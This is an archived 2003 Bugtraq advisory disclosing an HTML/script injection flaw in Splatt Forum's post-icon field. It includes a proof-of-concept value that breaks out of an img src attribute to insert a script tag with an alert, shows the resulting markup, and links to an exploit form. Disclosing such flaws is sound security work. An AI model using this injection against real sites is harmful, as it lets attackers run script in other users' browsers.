lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 15 Jul 2003 15:53:40 -0000
From: Lethalman <lethalman@...ero.it>
To: bugtraq@...urityfocus.com
Subject: Splatt Forum html injection code in post icon




Any user can inject html code when create a new post.
The bug are in the post icon:
&lt;img src="icon.gif" etc.&gt;
If you create a personalized form with this code:
icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;any
tag="
the final code of the post icon is:
&lt;img
src="icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;any
tag="" etc.&gt;

The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html

by Lethal Lab (Lethalman)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ